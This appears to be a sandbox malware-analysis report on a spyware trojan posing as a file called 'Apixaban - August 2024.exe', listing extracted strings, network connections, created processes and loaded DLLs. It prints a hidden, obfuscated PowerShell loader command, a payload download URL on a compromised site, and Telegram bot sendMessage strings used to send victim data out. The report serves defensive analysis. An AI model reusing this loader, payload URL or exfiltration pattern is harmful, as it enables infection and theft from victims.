          Source: wab.exe, 0000000A.00000002.2656016294.00000000274BF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2653419991.0000000025357000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2656016294.00000000274CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: wab.exe, 0000000A.00000002.2656016294.00000000274BF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2653419991.0000000025357000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2656016294.00000000274CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: powershell.exe, 00000002.00000002.2238762105.0000000004E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
          Source: wab.exe, 0000000A.00000002.2653419991.00000000252C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: wab.exe, 0000000A.00000002.2653419991.00000000252C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: wab.exe, 0000000A.00000002.2653419991.00000000252C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: wab.exe, 0000000A.00000002.2653419991.00000000252C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:061544%0D%0ADate%20a
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: wab.exe, 0000000A.00000002.2653419991.000000002539B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2653419991.00000000253CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: powershell.exe, 00000002.00000002.2241111452.0000000005E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000002.00000002.2241111452.0000000005E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000002.00000002.2241111452.0000000005E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: powershell.exe, 00000002.00000002.2238762105.0000000004F76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000002.00000002.2238176030.0000000003008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsof)
          Source: powershell.exe, 00000002.00000002.2238176030.0000000003008000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft
          Source: powershell.exe, 00000002.00000002.2241111452.0000000005E87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: wab.exe, 0000000A.00000002.2653419991.00000000252C4000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2653419991.000000002522B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: wab.exe, 0000000A.00000002.2653419991.000000002522B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: wab.exe, 0000000A.00000002.2653419991.000000002522B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
          Source: wab.exe, 0000000A.00000002.2653419991.00000000252C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: wab.exe, 0000000A.00000002.2654624146.0000000026201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: wab.exe, 0000000A.00000002.2653419991.00000000253CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
          Source: wab.exe, 0000000A.00000002.2653419991.00000000253C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
          Source: wab.exe, 0000000A.00000002.2640954167.0000000009850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reap.skyestates.com.mt/wp-includes/yPrtLahZfwrl128.bin
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownHTTPS traffic detected: 108.167.181.251:443 -> 192.168.2.8:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49727 version: TLS 1.2
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeCode function: 0_2_004052D1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052D1

          System Summary

          barindex
          Powershell drops PE file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Usurpatoren\Apixaban - August 2024.exeJump to dropped file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeCode function: 0_2_00403358 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403358
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeCode function: 0_2_00404B0E0_2_00404B0E
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeCode function: 0_2_0040653D0_2_0040653D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0251536210_2_02515362
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0251A08810_2_0251A088
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0251711810_2_02517118
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0251C19A10_2_0251C19A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0251C73810_2_0251C738
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0251C46810_2_0251C468
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0251D59910_2_0251D599
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0251CA0810_2_0251CA08
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_025169A010_2_025169A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0251CFAA10_2_0251CFAA
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0251EC1810_2_0251EC18
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0251CCD810_2_0251CCD8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_02513AA110_2_02513AA1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0251F80410_2_0251F804
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_025129EC10_2_025129EC
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_02513E0910_2_02513E09
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0251FC4E10_2_0251FC4E
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0251EC0A10_2_0251EC0A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_27787B7810_2_27787B78
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_27788FB010_2_27788FB0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778E14810_2_2778E148
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_277881D010_2_277881D0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778F37810_2_2778F378
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_27787B7710_2_27787B77
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_27787B6910_2_27787B69
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778275810_2_27782758
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778275710_2_27782757
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778274810_2_27782748
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778532810_2_27785328
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778772010_2_27787720
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778772210_2_27787722
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778AF1810_2_2778AF18
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778531A10_2_2778531A
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778CF0810_2_2778CF08
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778230010_2_27782300
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778AF0710_2_2778AF07
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_27785BD810_2_27785BD8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_27785BCA10_2_27785BCA
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_27782BB010_2_27782BB0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778B3A810_2_2778B3A8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_27782BAF10_2_27782BAF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_27782BA010_2_27782BA0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_27788FA110_2_27788FA1
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778D39810_2_2778D398
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778B39810_2_2778B398
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778F38810_2_2778F388
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778578010_2_27785780
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778D38710_2_2778D387
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_27784A7810_2_27784A78
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778CA7810_2_2778CA78
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_27786E7010_2_27786E70
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778EA6810_2_2778EA68
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_27784A6810_2_27784A68
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778CA6D10_2_2778CA6D
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_27781A5010_2_27781A50
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778EA5710_2_2778EA57
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_27781A4110_2_27781A41
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778462010_2_27784620
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_27786A1810_2_27786A18
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778461010_2_27784610
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778EEF810_2_2778EEF8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_277822F010_2_277822F0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778CEF710_2_2778CEF7
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778EEE710_2_2778EEE7
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_27784ED010_2_27784ED0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_277872C810_2_277872C8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_27784EC010_2_27784EC0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_277872B810_2_277872B8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_27781EA810_2_27781EA8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_27781E9810_2_27781E98
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778C15810_2_2778C158
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_27780D4810_2_27780D48
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778C14810_2_2778C148
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778A53810_2_2778A538
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778E13810_2_2778E138
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778A52810_2_2778A528
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_277815F810_2_277815F8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778C5E810_2_2778C5E8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_277815E810_2_277815E8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778E5D810_2_2778E5D8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778C5DF10_2_2778C5DF
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778E5C810_2_2778E5C8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_277811A010_2_277811A0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778119010_2_27781190
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778346010_2_27783460
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778345010_2_27783450
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778004010_2_27780040
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778B83810_2_2778B838
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778603010_2_27786030
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778D82810_2_2778D828
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778B82B10_2_2778B82B
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778602210_2_27786022
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778F81810_2_2778F818
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778D81910_2_2778D819
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778001F10_2_2778001F
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778F80910_2_2778F809
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_277808F010_2_277808F0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778BCC810_2_2778BCC8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_277838B810_2_277838B8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778DCB810_2_2778DCB8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778BCB710_2_2778BCB7
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778FCA810_2_2778FCA8
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778DCA710_2_2778DCA7
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778049810_2_27780498
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778FC9810_2_2778FC98
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778648810_2_27786488
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_2778048910_2_27780489
          Source: Apixaban - August 2024.exeStatic PE information: invalid certificate
          Source: Apixaban - August 2024.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/11@5/5
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeCode function: 0_2_004045C8 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045C8
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1988:120:WilError_03
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeFile created: C:\Users\user\AppData\Local\Temp\nsfF63D.tmpJump to behavior
          Source: Apixaban - August 2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Apixaban - August 2024.exeReversingLabs: Detection: 52%
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeFile read: C:\Users\user\Desktop\Apixaban - August 2024.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Apixaban - August 2024.exe "C:\Users\user\Desktop\Apixaban - August 2024.exe"
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$nonrationally=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Kompottens.Sub';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) "
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$nonrationally=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Kompottens.Sub';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) "Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Apixaban - August 2024.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
